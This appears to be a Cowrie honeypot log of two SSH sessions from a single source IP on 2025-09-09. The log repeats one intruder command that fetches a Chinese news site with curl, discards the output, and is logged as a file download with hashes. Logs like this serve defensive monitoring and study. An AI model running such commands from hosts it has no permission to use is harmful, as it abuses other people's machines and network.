{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.637475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.674013Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.675550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.677820Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.679137Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.713451Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.714814Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.717191Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.718354Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.732440Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.734861Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.754605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.756032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.760333Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.761511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.798251Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.800024Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.802897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.803826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.826234Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.828108Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.848455Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.850342Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.853346Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.854452Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.887954Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.898320Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.899711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.905870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.907410Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.930721Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.938964Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.943864Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.945148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.951706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.953361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.979837Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.993616Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.995083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.002121Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.003487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.050975Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.052311Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.065753Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.066899Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.086403Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.097381Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.099015Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.113799Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.115289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.140790Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.142064Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.160049Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.161357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.164894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.185001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.186332Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.194521Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.199516Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.200883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.220839Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.225473Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.226823Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.243263Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.244668Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.249936Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.254331Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.264980Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.266181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.288577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.289996Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.303209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.304273Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.332301Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.334337Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.335738Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.342057Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.343373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.377916Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.379419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.383178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.384779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.417976Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.421947Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.423076Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.425057Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.426148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.465678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.467207Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.470799Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.471901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.510580Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.511986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.516652Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.517463Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.554639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.555878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.559655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.561311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.591880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.593360Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.600634Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.601689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.643551Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.644888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
